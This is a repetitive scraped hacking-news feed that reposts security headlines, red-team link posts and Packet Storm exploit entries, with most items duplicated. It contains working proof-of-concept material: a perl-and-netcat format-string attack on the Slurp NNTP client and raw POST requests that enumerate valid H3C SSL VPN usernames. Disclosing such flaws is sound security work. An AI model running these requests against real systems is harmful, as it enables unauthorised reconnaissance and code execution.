Hacking Articles Tips Tricks Videos Tutorials
Photo
Dark Reading: Attacks/Breaches
(ISC)² to Pilot Online Proctored Exams for CISSP in U.S., U.K. and Singapore
Second pilot program will assess feasibility and security of offering online exams to increase global accessibility for certification candidates.
___________________________
@hacking_Attack
@Hacking_Video
(ISC)² to Pilot Online Proctored Exams for CISSP in U.S., U.K. and Singapore
Second pilot program will assess feasibility and security of offering online exams to increase global accessibility for certification candidates.
___________________________
@hacking_Attack
@Hacking_Video
Dark Reading
(ISC)² to Pilot Online Proctored Exams for CISSP in U.S., U.K. and Singapore
Second pilot program will assess feasibility and security of offering online exams to increase global accessibility for certification candidates.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Dark Reading: Attacks/Breaches
One Identity Enhances Unified Identity Security Platform with CIEM, Application Governance and Teams Modules
Plans to further advance vision for end-to-end identity security.
___________________________
@hacking_Attack
@Hacking_Video
One Identity Enhances Unified Identity Security Platform with CIEM, Application Governance and Teams Modules
Plans to further advance vision for end-to-end identity security.
___________________________
@hacking_Attack
@Hacking_Video
Dark Reading
One Identity Enhances Unified Identity Security Platform with CIEM, Application Governance and Teams Modules
Plans to further advance vision for end-to-end identity security.
Persistence – Notepad++ Plugins
https://www.reddit.com/r/redteamsec/comments/ssf01p/persistence_notepad_plugins/
submitted by /u/netbiosX (https://www.reddit.com/user/netbiosX)
[link] (https://pentestlab.blog/2022/02/14/persistence-notepad-plugins/) [comments] (https://www.reddit.com/r/redteamsec/comments/ssf01p/persistence_notepad_plugins/)
___________________________
@hacking_Attack
@Hacking_Video
https://www.reddit.com/r/redteamsec/comments/ssf01p/persistence_notepad_plugins/
submitted by /u/netbiosX (https://www.reddit.com/user/netbiosX)
[link] (https://pentestlab.blog/2022/02/14/persistence-notepad-plugins/) [comments] (https://www.reddit.com/r/redteamsec/comments/ssf01p/persistence_notepad_plugins/)
___________________________
@hacking_Attack
@Hacking_Video
reddit
Persistence – Notepad++ Plugins
Posted in r/redteamsec by u/netbiosX • 4 points and 0 comments
What is the Bug Bounty ?
Often translated into French as “prime au bogue” or “bounty for the detected flaw”, the bug bounty appeared in the 90s within Netscape…Continue reading on CyberSecurity and GDPR compliance »
Read more...
Often translated into French as “prime au bogue” or “bounty for the detected flaw”, the bug bounty appeared in the 90s within Netscape…Continue reading on CyberSecurity and GDPR compliance »
Read more...
cube0x0/KrbRelay: Framework for Kerberos relaying
https://www.reddit.com/r/redteamsec/comments/ssgqy3/cube0x0krbrelay_framework_for_kerberos_relaying/
submitted by /u/dmchell (https://www.reddit.com/user/dmchell)
[link] (https://github.com/cube0x0/KrbRelay) [comments] (https://www.reddit.com/r/redteamsec/comments/ssgqy3/cube0x0krbrelay_framework_for_kerberos_relaying/)
___________________________
@hacking_Attack
@Hacking_Video
https://www.reddit.com/r/redteamsec/comments/ssgqy3/cube0x0krbrelay_framework_for_kerberos_relaying/
submitted by /u/dmchell (https://www.reddit.com/user/dmchell)
[link] (https://github.com/cube0x0/KrbRelay) [comments] (https://www.reddit.com/r/redteamsec/comments/ssgqy3/cube0x0krbrelay_framework_for_kerberos_relaying/)
___________________________
@hacking_Attack
@Hacking_Video
reddit
cube0x0/KrbRelay: Framework for Kerberos relaying
Posted in r/redteamsec by u/dmchell • 3 points and 0 comments
Dropping Files on a Domain Controller Using CVE-2021-43893
https://www.reddit.com/r/redteamsec/comments/ssgrou/dropping_files_on_a_domain_controller_using/
submitted by /u/dmchell (https://www.reddit.com/user/dmchell)
[link] (https://www.rapid7.com/blog/post/2022/02/14/dropping-files-on-a-domain-controller-using-cve-2021-43893/) [comments] (https://www.reddit.com/r/redteamsec/comments/ssgrou/dropping_files_on_a_domain_controller_using/)
___________________________
@hacking_Attack
@Hacking_Video
https://www.reddit.com/r/redteamsec/comments/ssgrou/dropping_files_on_a_domain_controller_using/
submitted by /u/dmchell (https://www.reddit.com/user/dmchell)
[link] (https://www.rapid7.com/blog/post/2022/02/14/dropping-files-on-a-domain-controller-using-cve-2021-43893/) [comments] (https://www.reddit.com/r/redteamsec/comments/ssgrou/dropping_files_on_a_domain_controller_using/)
___________________________
@hacking_Attack
@Hacking_Video
reddit
Dropping Files on a Domain Controller Using CVE-2021-43893
Posted in r/redteamsec by u/dmchell • 9 points and 0 comments
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
WordPress International SMS For Contact Form 7 Integration 1.2 CSRF
https://1.bp.blogspot.com/-ju6c7E-5MWk/WWlvdc1QT-I/AAAAAAAAIPk/ByEXv5vo16UsrlpTJMmF2Op4hfJEgrRpQCLcBGAs/s1600/h79.png
WordPress International SMS for Contact Form 7 Integration plugin version 1.2 suffers from a cross site request forgery vulnerability.
MD5 |
Download
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
WordPress International SMS For Contact Form 7 Integration 1.2 CSRF
https://1.bp.blogspot.com/-ju6c7E-5MWk/WWlvdc1QT-I/AAAAAAAAIPk/ByEXv5vo16UsrlpTJMmF2Op4hfJEgrRpQCLcBGAs/s1600/h79.png
WordPress International SMS for Contact Form 7 Integration plugin version 1.2 suffers from a cross site request forgery vulnerability.
MD5 |
3bdeefa3f49313e66ab472b8a9a22a45Download
# Exploit Title: WordPress Plugin International Sms For Contact Form 7 Integration V1.2 - Cross-Site Request Forgery (CSRF)
# Date: 2022-02-09
# Author: Milad Karimi
# Software Link: https://wordpress.org/plugins/cf7-international-sms-integration/
# Version: 1.2
# Tested on: Windows 11
# CVE: CVE-2022-24272
1. Description:
The plugin International Sms For Contact Form 7 Integration for class-sms-log-display.php and was lacking CSRF check, allowing attackers to make logged in users perform unwanted actions, such as change the calculator headers.
Due to the lack of sanitisation, this could also lead to a Stored Cross-Site Scripting issue
2. Proof of Concept:
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
WordPress International SMS For Contact Form 7 Integration 1.2 CSRF
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Slurp 1.10.2 Format String
https://4.bp.blogspot.com/-JipZY3hUF7s/WWlu7l1ccBI/AAAAAAAAIJc/HAISYb4KBsQdeIf6OzzYRuXiYaIkpQnmACLcBGAs/s1600/h110.png
Slurp version 1.10.2 suffers from a format string vulnerability.
MD5 |
Download
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Slurp 1.10.2 Format String
https://4.bp.blogspot.com/-JipZY3hUF7s/WWlu7l1ccBI/AAAAAAAAIJc/HAISYb4KBsQdeIf6OzzYRuXiYaIkpQnmACLcBGAs/s1600/h110.png
Slurp version 1.10.2 suffers from a format string vulnerability.
MD5 |
c7e580d45afb71348edf920a4484967eDownload
# Exploit Title: Slurp 1.10.2 - Remote Format String Date: 2022-02-12
# Author: Milad Karimi
slurp is a freely available, open source NNTP client. It is designed for use on most Unix and Linux operating systems.
It may be possible for a remote server to execute code on a vulnerable client. slurp offers functionality that allows the software to write messages to the system log. A format string vulnerability in the syslog function may allow a malicious server to supply a custom format string that writes to an arbitrary address in memory.
perl -e 'print "BY BY BY \n666 %x%x%x\n'" | nc -l -p 112
Then check /var/log/messages for something like:
slurp[39926]: do_newnews: NNTP protocol error: got '666 bfbff4f8804bc1bbfbff51c'
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
Slurp 1.10.2 Format String
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
H3C SSL VPN Username Enumeration
https://4.bp.blogspot.com/-jEyO8wrBbtw/WWlvSr9oRmI/AAAAAAAAINg/irp20P4NPo4dOJoHHzIQ0XpAovWCMUh6wCLcBGAs/s1600/h38.png
H3C SSL VPN suffers from a username enumeration vulnerability during the login sequence.
MD5 |
Download
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
H3C SSL VPN Username Enumeration
https://4.bp.blogspot.com/-jEyO8wrBbtw/WWlvSr9oRmI/AAAAAAAAINg/irp20P4NPo4dOJoHHzIQ0XpAovWCMUh6wCLcBGAs/s1600/h38.png
H3C SSL VPN suffers from a username enumeration vulnerability during the login sequence.
MD5 |
f614ad7c6ba6e189b449ed5dd7112196Download
H3C SSL VPN Username Enumeration
Vendor: Hangzhou H3C Technologies Co. | New H3C Technologies Co., Ltd.
Product web page: https://www.h3c.com
Affected version: n/a
Summary: H3C SSL VPN is a secure VPN system based on SSL connections. It allows mobile employees
to access corporate networks remotely in an easy and secure way. The H3C SSL VPN devices are a
new generation of professional SSL VPN devices for enterprises. They can function as ingress
gateways as well as proxy gateways of internal server clusters. The SecPath SSL VPN devices are
for small-to medium-sized enterprises, while the SecBlade SSL VPN devices are for medium-sized
enterprises.
Desc: The weakness is caused due to the login script and how it verifies provided credentials. An
attacker can use this weakness to enumerate valid users on the affected application via 'txtUsrName'
POST parameter.
Tested on: ssl vpn gateway HttpServer 1.1
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2022-5697
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5697.php
24.01.2022
--
Non-valid:
----------
POST https://10.0.0.5/svpn/vpnuser/login_submit.cgi
txtMacAddr=000000000000&svpnlang=en&selIdentity=1&txtUsrName=root&txtPassword=123456&selDomain=1&authmethod=1&vldCode=
User is not exist
Valid:
------
POST https://10.0.0.5/svpn/vpnuser/login_submit.cgi
txtMacAddr=000000000000&svpnlang=en&selIdentity=1&txtUsrName=administrator&txtPassword=123456&selDomain=1&authmethod=1&vldCode=
Input password incorrect
Valid:
------
POST https://10.0.0.5/svpn/vpnuser/login_submit.cgi
txtMacAddr=000000000000&svpnlang=en&selIdentity=1&txtUsrName=guest&txtPassword=123456&selDomain=1&authmethod=1&vldCode=
Local user state is inactive
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
H3C SSL VPN Username Enumeration
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
How to get into bug bounties — A list of resources by The XSS Rat
https://thexssrat.medium.com/how-to-get-into-bug-bounties-a-list-of-resources-by-the-xss-rat-4ad10dacd966?source=rss------bug_bounty-5
___________________________
@hacking_Attack
@Hacking_Video
https://thexssrat.medium.com/how-to-get-into-bug-bounties-a-list-of-resources-by-the-xss-rat-4ad10dacd966?source=rss------bug_bounty-5
___________________________
@hacking_Attack
@Hacking_Video
Medium
How to get into bug bounties — A list of resources
Hello friends, I’ve seen this question come by often so I’ve decided to try and group all the resources of myself that I have about…
Hello friends, I’ve seen this question come by often so I’ve decided to try and group all the resources of myself that I have about…Continue reading on Medium » (https://thexssrat.medium.com/how-to-get-into-bug-bounties-a-list-of-resources-by-the-xss-rat-4ad10dacd966?source=rss------bug_bounty-5)
___________________________
@hacking_Attack
@Hacking_Video
___________________________
@hacking_Attack
@Hacking_Video
Medium
How to get into bug bounties — A list of resources
Hello friends, I’ve seen this question come by often so I’ve decided to try and group all the resources of myself that I have about…
hacking: security in practice
I created another OSINT tool to find Instagram places and posts based on their locaiton
Hi Everyone,
I hope you are doing well. Last week I created a tool for finding tweets based on locations (https://birdhunt.co/) and I have created an app that does the same for Instagram places/posts. It's completely free to use again, It is desktop only but would love to make it mobile-friendly in the future.
the new tool can be found here: https://instahunt.co/
It would be great to hear your thoughts and feedback!
submitted by /u/LibertyProgram
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
I created another OSINT tool to find Instagram places and posts based on their locaiton
Hi Everyone,
I hope you are doing well. Last week I created a tool for finding tweets based on locations (https://birdhunt.co/) and I have created an app that does the same for Instagram places/posts. It's completely free to use again, It is desktop only but would love to make it mobile-friendly in the future.
the new tool can be found here: https://instahunt.co/
It would be great to hear your thoughts and feedback!
submitted by /u/LibertyProgram
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
reddit
I created another OSINT tool to find Instagram places and posts...
Hi Everyone, I hope you are doing well. Last week I created a tool for finding tweets based on locations...
https://external-preview.redd.it/XgKCLfVCBI9E5iWKPvzE9yEVWbK32k_iDwn4g2_qjMw.jpg?width=640&crop=smart&auto=webp&s=647acfb76dc4b9fb247006b2dca58f96627e4509 Started down this rabbit hole to try and make a dumb remote smart. Anything to spoof button presses and also has a web interface takes too much power since it runs on 3XAAA, so I started trying to clone the dumb state signals. Picked up an RTLSDR dongle and confirmed that the transmissions are at 417.9 Mhz. Pic below of what one of the signals looks like in URH. Even if I could identify the proper code, I have no idea how to transmit at that frequency. The controller has a custom programmed RFM110 transmitter. Thoughts on how I could proceed?
https://preview.redd.it/jfca9ixupth81.png?width=1023&format=png&auto=webp&s=eaaa9207f34504fe81bcaafa0a1ec774efdcfad9
submitted by /u/moose09876
[link] [comments]
https://preview.redd.it/jfca9ixupth81.png?width=1023&format=png&auto=webp&s=eaaa9207f34504fe81bcaafa0a1ec774efdcfad9
submitted by /u/moose09876
[link] [comments]